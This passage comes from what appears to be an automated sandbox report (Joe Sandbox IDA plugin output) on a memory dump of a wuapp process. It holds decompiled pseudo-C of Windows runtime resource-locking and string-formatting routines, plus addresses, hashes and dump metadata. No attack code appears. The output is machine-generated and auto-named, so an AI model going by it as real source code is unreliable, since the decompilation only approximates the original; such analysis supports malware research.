							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01f801c0;
									_push(_t144);
									_push(0);
									_t51 = E01E9F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01EE4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01EF3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01EF3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01F2217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01EF3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01EE3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x01f801c0;
												_push(_t138);
												_push(0);
												_t58 = E01E9F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01EE4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01EF3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01EF3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01F2217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01EF3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01EE3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01EC5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01E9F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01EE3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01E9F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01EE3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01E9F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01EE3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E01EC5329(_t110, _t138);
																_t69 = E01EC53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                        0x01ee055a
                                                        0x01ee055d
                                                        0x01ee0563
                                                        0x01ee0566
                                                        0x01ee05d8
                                                        0x01ee05e2
                                                        0x01ee05e5
                                                        0x00000000
                                                        0x01ee05e7
                                                        0x01ee05e7
                                                        0x01ee05ea
                                                        0x01ee05f3
                                                        0x01ee05f3
                                                        0x01ee0568
                                                        0x01ee0568
                                                        0x01ee0568
                                                        0x01ee0569
                                                        0x01ee0569
                                                        0x01ee0569
                                                        0x01ee056b
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0217f
                                                        0x01f02183
                                                        0x01f0225b
                                                        0x01f0225f
                                                        0x01f02189
                                                        0x01f0218c
                                                        0x01f0218f
                                                        0x01f02194
                                                        0x01f02199
                                                        0x01f0219d
                                                        0x01f021a0
                                                        0x01f021a2
                                                        0x01f021ce
                                                        0x01f021ce
                                                        0x01f021ce
                                                        0x01f021d0
                                                        0x01f021d6
                                                        0x01f021de
                                                        0x01f021e2
                                                        0x01f021e8
                                                        0x01f021e9
                                                        0x01f021ec
                                                        0x01f021f1
                                                        0x01f021f6
                                                        0x00000000
                                                        0x00000000
                                                        0x01f021f8
                                                        0x01f021fb
                                                        0x01f02206
                                                        0x01f0220b
                                                        0x01f0220c
                                                        0x01f02217
                                                        0x01f02226
                                                        0x01f0222b
                                                        0x01f0222c
                                                        0x01f0222f
                                                        0x01f02232
                                                        0x01f02235
                                                        0x01f02235
                                                        0x01f0223a
                                                        0x01f0223f
                                                        0x01f02241
                                                        0x01f02243
                                                        0x01f02248
                                                        0x01f02248
                                                        0x01f0224d
                                                        0x01f0224f
                                                        0x01f02262
                                                        0x01f02263
                                                        0x01f02268
                                                        0x01f02269
                                                        0x01f02269
                                                        0x01f02269
                                                        0x01f0226d
                                                        0x00000000
                                                        0x00000000
                                                        0x01f02276
                                                        0x01f02279
                                                        0x01f0227e
                                                        0x01f02283
                                                        0x01f02287
                                                        0x01f0228a
                                                        0x01f0228d
                                                        0x01f0228f
                                                        0x01f022bc
                                                        0x01f022bc
                                                        0x01f022bc
                                                        0x01f022be
                                                        0x01f022c4
                                                        0x01f022cc
                                                        0x01f022d0
                                                        0x01f022d6
                                                        0x01f022d7
                                                        0x01f022da
                                                        0x01f022df
                                                        0x01f022e4
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022e6
                                                        0x01f022e9
                                                        0x01f022f4
                                                        0x01f022f9
                                                        0x01f022fa
                                                        0x01f02305
                                                        0x01f02314
                                                        0x01f02319
                                                        0x01f0231a
                                                        0x01f0231d
                                                        0x01f02320
                                                        0x01f02323
                                                        0x01f02323
                                                        0x01f02328
                                                        0x01f0232d
                                                        0x01f0232f
                                                        0x01f02331
                                                        0x01f02336
                                                        0x01f02336
                                                        0x01f0233b
                                                        0x01f0233d
                                                        0x01f02350
                                                        0x01f02351
                                                        0x01f02356
                                                        0x01f02359
                                                        0x01f02359
                                                        0x01f0235b
                                                        0x01f0235d
                                                        0x01ec5367
                                                        0x01ec536b
                                                        0x01ec5372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f02363
                                                        0x01f02363
                                                        0x01f02369
                                                        0x01f0236a
                                                        0x01f0236c
                                                        0x01f02371
                                                        0x01f02373
                                                        0x00000000
                                                        0x01f02379
                                                        0x01f02379
                                                        0x01f0237a
                                                        0x01f0237f
                                                        0x01f0237f
                                                        0x01f02385
                                                        0x01f02386
                                                        0x01f02389
                                                        0x01f0238e
                                                        0x01f02390
                                                        0x01ec5378
                                                        0x01ec537c
                                                        0x01f02396
                                                        0x01f02396
                                                        0x01f02397
                                                        0x01f0239c
                                                        0x01f023a2
                                                        0x01f023a3
                                                        0x01f023a6
                                                        0x01f023ab
                                                        0x01f023ad
                                                        0x00000000
                                                        0x01f023b3
                                                        0x01f023b3
                                                        0x01f023b4
                                                        0x01f023b9
                                                        0x01f023ba
                                                        0x01f023ba
                                                        0x01f023bc
                                                        0x01f023bf
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef9153
                                                        0x01ef9158
                                                        0x01ef915a
                                                        0x01ef915e
                                                        0x01ef9160
                                                        0x00000000
                                                        0x01ef9166
                                                        0x01ef9166
                                                        0x01ef9171
                                                        0x01ef9176
                                                        0x01ef9176
                                                        0x00000000
                                                        0x01ef9160
                                                        0x01f023c6
                                                        0x01f023ce
                                                        0x01f023d7
                                                        0x01f023d7
                                                        0x01f023ad
                                                        0x01f02390
                                                        0x01f02373
                                                        0x01f0233f
                                                        0x01f0233f
                                                        0x00000000
                                                        0x01f0233f
                                                        0x01f02291
                                                        0x01f02291
                                                        0x01f02293
                                                        0x01f02295
                                                        0x01f0229a
                                                        0x01f022a1
                                                        0x01f022a3
                                                        0x01f022a7
                                                        0x01f022a9
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022ab
                                                        0x01f022ad
                                                        0x01f022af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022af
                                                        0x01f022b1
                                                        0x01f022b4
                                                        0x01f022b4
                                                        0x01f022b6
                                                        0x01ec53be
                                                        0x01ec53be
                                                        0x01ec53be
                                                        0x01ec53c0
                                                        0x00000000
                                                        0x00000000
                                                        0x01ec53cb
                                                        0x01ec53ce
                                                        0x01ec53d0
                                                        0x01ec53d4
                                                        0x01ec53d6
                                                        0x00000000
                                                        0x01ec53d8
                                                        0x01ec53e3
                                                        0x01ec53ea
                                                        0x01ec53ea
                                                        0x00000000
                                                        0x01ec53d6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022b6
                                                        0x00000000
                                                        0x01f0228f
                                                        0x01f02349
                                                        0x01f0234d
                                                        0x01f02251
                                                        0x01f02251
                                                        0x00000000
                                                        0x01f02251
                                                        0x01f021a4
                                                        0x01f021a4
                                                        0x01f021a6
                                                        0x01f021a8
                                                        0x01f021ac
                                                        0x01f021b6
                                                        0x01f021b8
                                                        0x01f021bc
                                                        0x01f021be
                                                        0x00000000
                                                        0x00000000
                                                        0x01f021c0
                                                        0x01f021c2
                                                        0x01f021c4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f021c4
                                                        0x01f021c6
                                                        0x01f021c6
                                                        0x01f021c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f021c8
                                                        0x01f021a2
                                                        0x00000000
                                                        0x01f02183
                                                        0x01ee057b
                                                        0x01ee057d
                                                        0x01ee0581
                                                        0x01ee0583
                                                        0x01f02178
                                                        0x00000000
                                                        0x01ee0589
                                                        0x01ee058f
                                                        0x01ee058f
                                                        0x01ee0583
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F02206
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-4236105082
                                                        • Opcode ID: 5a57b996eb6ec08281a5615ab8b8e086c0141f02edd8191760e3815219816ab5
                                                        • Instruction ID: 72ceabc3cc8628e4a72b636c4942a9702b677b7f92a2c18d924f0937e509de8f
                                                        • Opcode Fuzzy Hash: 5a57b996eb6ec08281a5615ab8b8e086c0141f02edd8191760e3815219816ab5
                                                        • Instruction Fuzzy Hash: 6E513D35B00252ABEB168A18DC85F9A73AAAF94710F255219FD44DF2C5EA72EC4187A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EE14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E01EE14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x1f82088; // 0x76a06099
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01ED7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01EE13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01ED7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01ED7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01EA2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01EAE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                        0x01ee14c0
                                                        0x01ee14cb
                                                        0x01ee14d2
                                                        0x01ee14d6
                                                        0x01ee14da
                                                        0x01ee14de
                                                        0x01ee14e3
                                                        0x01ee157a
                                                        0x01ee157a
                                                        0x01ee14f1
                                                        0x01ee14f3
                                                        0x01f0ea0f
                                                        0x00000000
                                                        0x01f0ea15
                                                        0x00000000
                                                        0x01f0ea15
                                                        0x01ee14f9
                                                        0x01ee14f9
                                                        0x01ee14fe
                                                        0x01ee1504
                                                        0x01f0ea1a
                                                        0x01f0ea1f
                                                        0x01f0ea21
                                                        0x01f0ea22
                                                        0x01f0ea27
                                                        0x01f0ea2a
                                                        0x01f0ea2a
                                                        0x01ee1515
                                                        0x01ee1517
                                                        0x01ee156d
                                                        0x01ee1572
                                                        0x01ee1575
                                                        0x01ee1575
                                                        0x01ee151e
                                                        0x01f0ea50
                                                        0x01f0ea55
                                                        0x01f0ea58
                                                        0x01f0ea58
                                                        0x01ee152e
                                                        0x01ee1531
                                                        0x01ee1533
                                                        0x00000000
                                                        0x01ee1535
                                                        0x01ee1541
                                                        0x01ee1549
                                                        0x01ee1549
                                                        0x01ee1533
                                                        0x01ee14f3
                                                        0x01ee1559

                                                        APIs
                                                        • ___swprintf_l.LIBCMT ref: 01F0EA22
                                                          • Part of subcall function 01EE13CB: ___swprintf_l.LIBCMT ref: 01EE146B
                                                          • Part of subcall function 01EE13CB: ___swprintf_l.LIBCMT ref: 01EE1490
                                                        • ___swprintf_l.LIBCMT ref: 01EE156D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: 23f76da30b52ccbbded2391d66a30b86086dabf7064085ca9bbd568aa2575023
                                                        • Instruction ID: a18e46862f3fb1aee418cafdf6e85913b4423de2135273b97109b8718fc74d94
                                                        • Opcode Fuzzy Hash: 23f76da30b52ccbbded2391d66a30b86086dabf7064085ca9bbd568aa2575023
                                                        • Instruction Fuzzy Hash: 9221F572D0021A9BCB21DF58CC04AEE77FCBB14304F885455FD46E7141DB70AA988BE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EC53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 45%
                                                        			E01EC53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x01f801c0;
									_push(_t92);
									_push(0);
									_t37 = E01E9F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01EE4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01EF3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01EF3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01F2217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01EF3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01EE3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01EC5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01E9F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01EE3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01E9F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01EE3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01E9F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01EE3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E01EC5329(_t74, _t92);
													_push(1);
													_t48 = E01EC53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                        0x01ec53ab
                                                        0x01ec53ae
                                                        0x01ec53b1
                                                        0x01ec53b4
                                                        0x01ec53b7
                                                        0x01ee05b6
                                                        0x01ee05c0
                                                        0x01ee05c3
                                                        0x00000000
                                                        0x01ee05c9
                                                        0x01ee05c9
                                                        0x01ee05cc
                                                        0x01ee05d5
                                                        0x01ee05d5
                                                        0x01ec53bd
                                                        0x01ec53bd
                                                        0x01ec53bd
                                                        0x01ec53be
                                                        0x01ec53be
                                                        0x01ec53be
                                                        0x01ec53c0
                                                        0x00000000
                                                        0x00000000
                                                        0x01f02269
                                                        0x01f0226d
                                                        0x01f02349
                                                        0x01f0234d
                                                        0x01f02273
                                                        0x01f02276
                                                        0x01f02279
                                                        0x01f0227e
                                                        0x01f02283
                                                        0x01f02287
                                                        0x01f0228a
                                                        0x01f0228d
                                                        0x01f0228f
                                                        0x01f022bc
                                                        0x01f022bc
                                                        0x01f022bc
                                                        0x01f022be
                                                        0x01f022c4
                                                        0x01f022cc
                                                        0x01f022d0
                                                        0x01f022d6
                                                        0x01f022d7
                                                        0x01f022da
                                                        0x01f022df
                                                        0x01f022e4
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022e6
                                                        0x01f022e9
                                                        0x01f022f4
                                                        0x01f022f9
                                                        0x01f022fa
                                                        0x01f02305
                                                        0x01f02314
                                                        0x01f02319
                                                        0x01f0231a
                                                        0x01f0231d
                                                        0x01f02320
                                                        0x01f02323
                                                        0x01f02323
                                                        0x01f02328
                                                        0x01f0232d
                                                        0x01f0232f
                                                        0x01f02331
                                                        0x01f02336
                                                        0x01f02336
                                                        0x01f0233b
                                                        0x01f0233d
                                                        0x01f02350
                                                        0x01f02351
                                                        0x01f02356
                                                        0x01f02359
                                                        0x01f02359
                                                        0x01f0235b
                                                        0x01f0235d
                                                        0x01ec5367
                                                        0x01ec536b
                                                        0x01ec5372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f02363
                                                        0x01f02363
                                                        0x01f02369
                                                        0x01f0236a
                                                        0x01f0236c
                                                        0x01f02371
                                                        0x01f02373
                                                        0x00000000
                                                        0x01f02379
                                                        0x01f02379
                                                        0x01f0237a
                                                        0x01f0237f
                                                        0x01f0237f
                                                        0x01f02385
                                                        0x01f02386
                                                        0x01f02389
                                                        0x01f0238e
                                                        0x01f02390
                                                        0x01ec5378
                                                        0x01ec537c
                                                        0x01f02396
                                                        0x01f02396
                                                        0x01f02397
                                                        0x01f0239c
                                                        0x01f023a2
                                                        0x01f023a3
                                                        0x01f023a6
                                                        0x01f023ab
                                                        0x01f023ad
                                                        0x00000000
                                                        0x01f023b3
                                                        0x01f023b3
                                                        0x01f023b4
                                                        0x01f023b9
                                                        0x01f023ba
                                                        0x01f023ba
                                                        0x01f023bc
                                                        0x01f023bf
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef9153
                                                        0x01ef9158
                                                        0x01ef915a
                                                        0x01ef915e
                                                        0x01ef9160
                                                        0x00000000
                                                        0x01ef9166
                                                        0x01ef9166
                                                        0x01ef9171
                                                        0x01ef9176
                                                        0x01ef9176
                                                        0x00000000
                                                        0x01ef9160
                                                        0x01f023c6
                                                        0x01f023cb
                                                        0x01f023ce
                                                        0x01f023d7
                                                        0x01f023d7
                                                        0x01f023ad
                                                        0x01f02390
                                                        0x01f02373
                                                        0x01f0233f
                                                        0x01f0233f
                                                        0x00000000
                                                        0x01f0233f
                                                        0x01f02291
                                                        0x01f02291
                                                        0x01f02293
                                                        0x01f02295
                                                        0x01f0229a
                                                        0x01f022a1
                                                        0x01f022a3
                                                        0x01f022a7
                                                        0x01f022a9
                                                        0x00000000
